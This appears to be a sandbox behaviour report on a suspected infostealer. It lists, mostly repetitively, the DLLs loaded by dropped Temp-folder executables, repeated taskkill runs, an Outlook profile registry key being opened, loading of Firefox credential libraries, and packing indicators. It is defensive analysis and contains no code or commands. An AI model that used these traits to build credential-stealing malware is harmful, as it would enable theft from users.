Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001136001\88edf6a100.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001137001\num.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: g4Cyr2T5jq.exe Static file information: File size 1959936 > 1048576
Source: g4Cyr2T5jq.exe Static PE information: Raw size of ordjlgkm is bigger than: 0x100000 < 0x1acc00
Source: Binary string: mozglue.pdbP source: 7e96f85771.exe, 00000008.00000002.3210751552.000000006C91D000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: nss3.pdb@ source: 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: nss3.pdb source: 7e96f85771.exe, 00000008.00000002.3211531901.000000006CADF000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: mozglue.pdb source: 7e96f85771.exe, 00000008.00000002.3210751552.000000006C91D000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: cb#3.Pdb#3. source: firefox.exe, 00000017.00000002.3106659324.000002882317B000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe Unpacked PE file: 0.2.g4Cyr2T5jq.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ordjlgkm:EW;zsnxwtzn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ordjlgkm:EW;zsnxwtzn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ordjlgkm:EW;zsnxwtzn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ordjlgkm:EW;zsnxwtzn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ordjlgkm:EW;zsnxwtzn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ordjlgkm:EW;zsnxwtzn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ordjlgkm:EW;zsnxwtzn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ordjlgkm:EW;zsnxwtzn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Unpacked PE file: 7.2.f84005b97f.exe.7d0000.0.unpack :EW;.rsrc :W;.idata :W;urronsyq:EW;rvyhmtwg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;urronsyq:EW;rvyhmtwg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Unpacked PE file: 8.2.7e96f85771.exe.810000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ypqgsygb:EW;vqrcrxym:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ypqgsygb:EW;vqrcrxym:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001134001\f84005b97f.exe Unpacked PE file: 9.2.f84005b97f.exe.7d0000.0.unpack :EW;.rsrc :W;.idata :W;urronsyq:EW;rvyhmtwg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;urronsyq:EW;rvyhmtwg:EW;.taggant:EW;
